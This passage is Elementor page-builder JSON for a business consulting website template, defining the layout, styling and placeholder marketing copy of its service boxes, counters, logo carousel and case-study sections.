society.<\/p>","_margin":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a45cb3a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title":"Business Project Development ","des":"","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"title_color":"#0B2A41","icon_space":{"unit":"px","size":35,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"icon_bg_width":{"unit":"px","size":0,"sizes":[]},"title_space_top":{"unit":"px","size":0,"sizes":[]},"title_space_bottom":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"_padding":{"unit":"px","top":"18","right":"20","bottom":"18","left":"20","isLinked":false},"_background_hover_background":"classic","_background_hover_color":"#F7F7F7","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iiconbox2"},{"id":"6b20c58","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title":"Strategic Development Plans ","des":"","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"title_color":"#0B2A41","icon_space":{"unit":"px","size":35,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"icon_bg_width":{"unit":"px","size":0,"sizes":[]},"title_space_top":{"unit":"px","size":0,"sizes":[]},"title_space_bottom":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"_padding":{"unit":"px","top":"18","right":"20","bottom":"18","left":"20","isLinked":false},"_background_hover_background":"classic","_background_hover_color":"#F7F7F7","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iiconbox2"},{"id":"e7b275b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title":"Search for Business Partners\n","des":"","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"title_color":"#0B2A41","icon_space":{"unit":"px","size":35,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"icon_bg_width":{"unit":"px","size":0,"sizes":[]},"title_space_top":{"unit":"px","size":0,"sizes":[]},"title_space_bottom":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"18","right":"20","bottom":"18","left":"20","isLinked":false},"_background_hover_background":"classic","_background_hover_color":"#F7F7F7","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false}],"isInner":false},{"id":"261751b","elType":"section","settings":{"layout":"full_width","z_index":1},"elements":[{"id":"ea50a64","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4fffecc","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]}},"elements":[{"id":"df82c4a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"09444b6","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]},"_padding":{"unit":"px","top":"60","right":"100","bottom":"60","left":"100","isLinked":false},"_padding_tablet":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"30","right":"30","bottom":"30","left":"30","isLinked":false},"_background_background":"classic","_background_color":"#55BB53","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iclogos"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"043c467","elType":"section","settings":{"padding":{"unit":"px","top":"175","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-home4.jpg","id":1849},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","margin":{"unit":"px","top":"-75","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"02b42de","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ddb427b","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"17fa399","elType":"column","settings":{"_column_size":50,"_inline_size":42},"elements":[{"id":"f128ae7","elType":"widget","settings":{"sub":"what we offer","title":"Make Digital Marketing  Work For<span class=\"hl-text\"> Your Business<\/span>","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#CCD5DB","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#FFFFFF"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"9e6d14f","elType":"column","settings":{"_column_size":50,"_inline_size":58},"elements":[{"id":"64aa4a1","elType":"widget","settings":{"editor":"<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them.<\/p>","text_color":"#AFC1CE"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"bdf67a8","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"63bc0b7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"fdd3604","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#12344D"},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"33abef5","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5914ab2","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#12344D"},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"e220231","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"738e679","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#12344D"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6d5c486","elType":"section","settings":{"structure":"40","padding":{"unit":"px","top":"50","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"c62df2f","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"078f7f5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_color":"#0B2A41","per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"eeac1a5","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"90d1def","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_color":"#0B2A41","per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"935e15d","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"f0dfdbe","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_color":"#0B2A41","per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"98a24bf","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"5d808a6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_color":"#0B2A41","per_color":"#0B2A41"},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"d7f76c0","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"325","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"120","left":"0","isLinked":false},"layout":"full_width","background_background":"classic","background_color":"#F5F5F5","padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"170","left":"0","isLinked":false}},"elements":[{"id":"7737673","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b5f5bc2","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"5a47173","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"651b811","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"dfc12dc","elType":"widget","settings":{"sub":"company poretfolio","title":"Our Latest<span class=\"hl-text\"> Case Studies<\/span>","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_color":"#95A2AC","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#0B2A41"},"elements":[],"widgetType":"iheading"},{"id":"b4408e1","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"48f3904","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"09026fe","elType":"widget","settings":{"tshow_mobile":"1","dots_spacing_mobile":{"unit":"px","size":-60,"sizes":[]}},"elements":[],"widgetType":"ipcarousel"}],"isInner":false}],"isInner":false},{"id":"0096508","elType":"section","settings":{"content_width":{"unit":"px","size":1350,"sizes":[]},"margin":{"unit":"px","top":"-135","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"e73bf22","elType":"column","settings":{"_column_size":100,"_inline_size":null,"background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[{"id":"3a29edb","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"45","right":"90","bottom":"45","left":"90","isLinked":false},"padding_mobile":{"unit":"px","top":"30","right":"30","bottom":"30","left":"30","isLinked":true}},"elements":[{"id":"fb03464","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1a8eaca","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/strategy.svg","id":1871},"library":"svg"},"title":"Businesses Guided <br>Over Thirty Years","number":"350","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Inter","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icounter2"}],"isInner":true},{"id":"5c2ddf3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"36e9363","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/files.svg","id":1869},"library":"svg"},"title":"Finished & Supported <br>Incredible Projects","number":"215","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Inter","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icounter2"}],"isInner":true},{"id":"e1627f1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"dc9b17e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/networking.svg","id":1870},"library":"svg"},"title":"Years of Experience <br>& Business Consulting","number":"15","after_number":"+","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Inter","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF"},"elements":[],"widgetType":"icounter2"}],"isInner":true},{"id":"4b42ff1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a3f5d6e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/certificate.svg","id":1867},"library":"svg"},"title":"Business Excellence <br>Awards Achieved","number":"20","after_number":"+","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Inter","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF"},"elements":[],"widgetType":"icounter2"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"ed99099","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"115","right":"0","bottom":"70","left":"0","isLinked":false}},"elements":[{"id":"42746d6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"c8d87fc","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"d7aa18e","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"5335329","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"7b3b0bf","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of<span class=\"hl-text\"> Finance Services<\/span>","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#0B2A41"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"040f13b","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0af28b3","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"30"},"elements":[{"id":"f4fc254","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"28eb4cf","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"bc2dfe1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4aa9b63","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"\u041erganizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"900a5ad","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet"},"elements":[{"id":"cf0e1ee","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"90f9beb","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"30","hide_desktop":"hidden-desktop","hide_mobile":"hidden-phone"},"elements":[{"id":"5141617","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"29d6230","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"371f7cc","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"114f3d5","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"75f0643","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"5adcd55","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"30"},"elements":[{"id":"fc23012","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet"},"elements":[{"id":"1b72517","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"0608cdc","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"545af29","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 